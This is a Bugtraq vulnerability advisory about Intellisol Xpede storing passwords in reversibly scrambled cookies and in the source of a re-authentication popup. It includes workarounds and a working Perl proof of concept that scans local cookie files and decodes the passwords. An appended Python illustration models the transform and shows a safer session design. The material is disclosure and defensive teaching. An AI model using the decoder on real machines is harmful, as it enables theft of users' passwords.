Bugtraq mailing list archives

Xpede passwords exposed (2 vuln.)


From: Gregory Duchemin <c3rb3r () hotmail com>
Date: 22 Mar 2002 13:04:31 -0000



Passwords exposed in Intellisol XPede
==========================


About Xpede
=========

quote from 
http://www.workforceroi.com/solutions/pa/index.shtml

"Intellisol Xpede is a browser-based time and 
expense entry and project cost management module 
designed to connect a remote workforce on a real-
time basis. 
Intellisol Project Accounting is designed for any 
professional service organization such as consulting, 
software development, law, architecture, 
engineering, PR/advertising and more with between 
10 and 500 million dollars in revenue and up to 500 
employees, 
and integrates with Microsoft Great Plains Business 
Solutions financial suites. "


Problems
=======

Tested with Xpede 4.1 / NT 4.0
Two security vulnerabilities have been discovered in 
the way Xpede handles user passwords.

1/    Xpede's cookies store the user's password 
"ciphered" in a very weak manner (a mix of shifts 
and permutations). Recovering the clear-text 
password from the cookie is trivial, which makes 
users remotely vulnerable to cross-site scripting 
based attacks and to various MSIE bugs, and locally 
vulnerable as well to anyone who can read the local 
filesystem (i.e. the cookie file), for instance when 
a user decides to use someone else's computer or 
uses a computer on which he shares Administrator 
rights with others.

2/   Passwords are shown in the clear in the source 
of the "session timeout" re-authentication popup. 
The guilty javascript snippet simulates a "remember 
password" option and tests whether it was checked in 
order to fill in the form's password field 
automatically. The clear password appears as-is in 
the javascript source whatever the user decided to 
do with the option.
A user can therefore have a false sense of safety: 
leaving his host even for a few seconds without 
having filled in the authentication popup exposes 
his password to everybody who looks at the page 
source and, once again, leaves him remotely 
vulnerable to the same MSIE bugs mentioned above.


Temp workarounds
=============

1st problem /   clear all cookies via 
MSIE "Tools/Internet Options/General/Delete 
Cookies" right after a session has ended, to avoid 
the local attack, and patch your browser with the 
latest security fixes if it wasn't already done 
(anyway, you may run into more serious trouble in 
the latter case :).

2nd problem /  do not expose the authentication 
popup to unwise eyes (log in or quit the application) 
and, again, patch your browser against the remote attacks.


Additionally, for the paranoid, I suggest closing all 
running MSIE windows before accessing the Xpede 
application (and during the session).



Vendor status
=========

The vendor has been contacted on March 13 and, as 
far as I know, is currently working on a patch; 
in the meantime, you may want to use the above 
workarounds. 



Versions
======

Xpede support team has reported that both Xpede 4.1 
and 7.x series were affected by these vulnerabilities.


Author & Date
===========

Gregory Duchemin (c3rb3r () hotmail com)
20 March 2002.


Have a nice day.



Proof of concept (password recovery from cookies)
====================================

#!/usr/bin/perl
# Xdeep.pl, search for and decipher Xpede passwords stored in these damn cookies
# Pr00f of concept, not to be used for illegal purposes.
#
# Author: Gregory Duchemin Aka c3rb3r // March 2002
#
use strict;
use warnings;

# output format (the format below reads these package variables)
our ($userid, $realname, $company, $password);

format STDOUT =
+ Userid: @<<<<<<<
$userid
+ Realname: @<<<<<<<<<<<<<<<<<<<<<<<<<
$realname
+ Company: @<<<<<<<<<<<<<<<<<<<<
$company
+ Encoded password: @<<<<<<<<<<<<<<<<<<<<
$password
.

# Cookie fingerprint: an Xpede cookie file starts with this name
my $signature = "defPWD";

# decoding stuff: a fixed 1-based permutation of the 11 encoded characters
# and a fixed per-position shift inside the 52-letter alphabet A-Z a-z
my @PERMU = (9, 11, 2, 6, 4, 10, 1, 8, 7, 3, 5);
my @ALPHA = ('A' .. 'Z', 'a' .. 'z');
my @SHIFT = (9, 5, 17, 26, 17, 22, 6, 2, 25, 6, 23);

# Change the following path to match your system
my @COOKIE = glob('c:\winnt\Profiles\*\Cookies\*@*.txt');

my $i     = 0;
my $count = 0;
my @FOUND;

print "\n\nXdeep.pl  Xpede cookies finder and decoder \n\n-- Gregory Duchemin (Aka C3rb3r) ^ Feb 2002 --\n\n\n";

# pass 1: keep the cookie files whose first line starts with the fingerprint
foreach my $try (@COOKIE) {
    $count++;
    if (open(my $fh, '<', $try)) {
        my @lines = <$fh>;
        # index() returns 0 when the signature sits at the very start of line 1
        if (defined $lines[0] && index($lines[0], $signature) == 0) {
            printf("\n+ Xpede cookie found ! yep :)  <=>  %s\n", $try);
            $FOUND[$i] = $try;
            $i++;
        }
        close($fh);
    }
}

printf("\n+ %d files checked.\n", $count);

if (!$i) {
    print "\n\n- No Xpede cookie found, sorry\n\n";
    exit(0);
}

printf("\n\n+ %d Cookie(s) found.\n", $i);
print "\n\n\n[Press return]\n";
my $pause = <STDIN>;

# pass 2: pull the fields out of each cookie file and decode the password
foreach my $try (@FOUND) {
    open(my $fh, '<', $try) or next;
    my @lines = <$fh>;

    # fixed line offsets of the fields inside the MSIE cookie file
    $userid   = $lines[55];
    $realname = $lines[64];
    $password = $lines[46];
    $company  = $lines[28];

    # undo the URL encoding: '+' is a space, %XX is a byte
    for ($userid, $realname, $password, $company) {
        s/\+/ /g;
        s/%([a-f0-9][a-f0-9])/pack("C", hex($1))/eig;
    }

    printf "\n+ Found Xpede cookie :\n>> %s <<\n\n", $try;
    write;
    print "\n\n! Cr4cking 1n progr3ss ... \n";

    my @list = split //, $password;    # last element is the trailing newline
    my ($MAX, $DIFF, $REST, $temp_pass, $decode) = (0, 0, "", "", "");

    # only 11 characters are transformed; anything beyond that is stored in
    # the clear at the front of the cookie value (the -1 accounts for "\n")
    if (length($password) > 12) {
        $MAX  = 11;
        $DIFF = length($password) - 1 - $MAX;
        for ($i = 0; $i < $DIFF; $i++) { $REST = $REST . $list[$i]; }
        splice(@list, 0, $DIFF);
        printf "\n+ Clear part is %s\n", $REST;
    }
    else {
        $MAX = length($password) - 1;
        printf "\n- No clear part found \n";
    }

    # step 1: undo the permutation (PERMU is 1-based)
    for ($i = 0; $i < $MAX; $i++) { $temp_pass = $temp_pass . $list[$PERMU[$i] - 1]; }
    printf "\n+ Permutations give %s\n", $temp_pass;

    # step 2: shift each letter forward by its position's fixed amount;
    # characters outside A-Za-z are left untouched
    @list = split //, $temp_pass;
    for ($i = 0; $i < $MAX; $i++) {
        my $in  = ord($list[$i]);
        my $c   = $SHIFT[$i];
        my $out = $in;
        for (my $z = 0; $z < 52; $z++) {
            if (ord($ALPHA[$z]) == $in) { $out = ord($ALPHA[($z + $c) % 52]); }
        }
        $decode = $decode . chr($out);
        printf "\n+ %s Shift(%d) \t --> \t%s", chr($in), $c, chr($out);
    }

    printf "\n\n+ Shifting with secret key give %s\n", $decode;
    printf "\n! Password is \"%s\"\n\n", $decode . $REST;
    printf "\n\n- End.\n\n";

    close($fh);
    print "\n\n[Press return]\n";
    $pause = <STDIN>;
}
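As an added illustration, which is not part of the original post nor of Xpede's code, the Python below re-expresses the cookie transform that the Perl script above reverses: a fixed 11-position permutation followed by a fixed shift per position over A-Z/a-z, with anything past the eleventh character kept in the clear in front of the encoded block. The two tables are copied from the script; the forward (encoding) direction and the "exactly 11 characters" convention are an inferred model, since the post only shows the decoder. The point for a defender is that no key is involved anywhere, so whoever holds the cookie (problem 1) can invert it, and the SessionStore at the end shows the design that removes the root cause of both problems: the browser holds an opaque random session id, the password never leaves the server, and there is nothing secret left to echo into a cookie or into the source of a re-authentication prompt (problem 2). The class and its method names are my own.

```python
import secrets
import string

# Tables copied from the proof-of-concept script: a 1-based permutation of the
# 11 transformed characters and a fixed shift for each position. The alphabet
# is A-Z followed by a-z (52 symbols); other characters pass through unchanged.
ALPHA = string.ascii_uppercase + string.ascii_lowercase
PERMU = [9, 11, 2, 6, 4, 10, 1, 8, 7, 3, 5]
SHIFT = [9, 5, 17, 26, 17, 22, 6, 2, 25, 6, 23]
BLOCK = len(PERMU)


def _shift(ch: str, amount: int) -> str:
    """Rotate a letter inside ALPHA; leave anything else as it is."""
    if ch in ALPHA:
        return ALPHA[(ALPHA.index(ch) + amount) % len(ALPHA)]
    return ch


def decode_block(block: str) -> str:
    """What the Perl script does to the 11 encoded characters:
    undo the permutation, then shift position i forward by SHIFT[i]."""
    if len(block) != BLOCK:
        raise ValueError("the transform covers exactly %d characters" % BLOCK)
    permuted = "".join(block[PERMU[i] - 1] for i in range(BLOCK))
    return "".join(_shift(ch, SHIFT[i]) for i, ch in enumerate(permuted))


def encode_block(block: str) -> str:
    """Forward direction, obtained by inverting decode_block (assumed model;
    the post shows only the decoder). Nothing here is a key: both tables are
    fixed and public, so the output is reversible by anyone who reads it."""
    if len(block) != BLOCK:
        raise ValueError("the transform covers exactly %d characters" % BLOCK)
    shifted = [_shift(ch, -SHIFT[i]) for i, ch in enumerate(block)]
    cookie = [""] * BLOCK
    for i in range(BLOCK):
        cookie[PERMU[i] - 1] = shifted[i]
    return "".join(cookie)


def password_to_cookie(password: str) -> str:
    """Model of the whole cookie value: characters past the 11th are stored
    in the clear in front of the encoded block (the script's 'clear part')."""
    if len(password) < BLOCK:
        raise ValueError("model only covers passwords of %d+ characters" % BLOCK)
    return password[BLOCK:] + encode_block(password[:BLOCK])


def cookie_to_password(value: str) -> str:
    """Recover the password from a value built by password_to_cookie."""
    clear = value[:-BLOCK]
    return decode_block(value[-BLOCK:]) + clear


class SessionStore:
    """What the cookie should carry instead: an opaque random session id that
    only the server can map back to a user. The password is never placed in
    the cookie and never echoed into a page, so neither a cookie file nor the
    source of a re-authentication prompt can give it away. Constructed for
    this example; not an Xpede API."""

    def __init__(self) -> None:
        self._sessions = {}

    def create(self, userid: str) -> str:
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self._sessions[token] = userid
        return token

    def lookup(self, token: str):
        return self._sessions.get(token)

    def revoke(self, token: str) -> None:
        self._sessions.pop(token, None)


if __name__ == "__main__":
    pw = "CorrectHorse9batt"  # constructed sample password
    cookie = password_to_cookie(pw)
    print("cookie value :", cookie)
    print("recovered    :", cookie_to_password(cookie))
    store = SessionStore()
    sid = store.create("jdoe")
    print("session id   :", sid, "->", store.lookup(sid))
```

Running the block prints the modelled cookie value, shows that it decodes back to the sample password with nothing but the two public tables, and then shows a session id that carries no information about the password at all; revoking the id on the server is what "log out" should mean, instead of asking the user to delete cookie files by hand.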

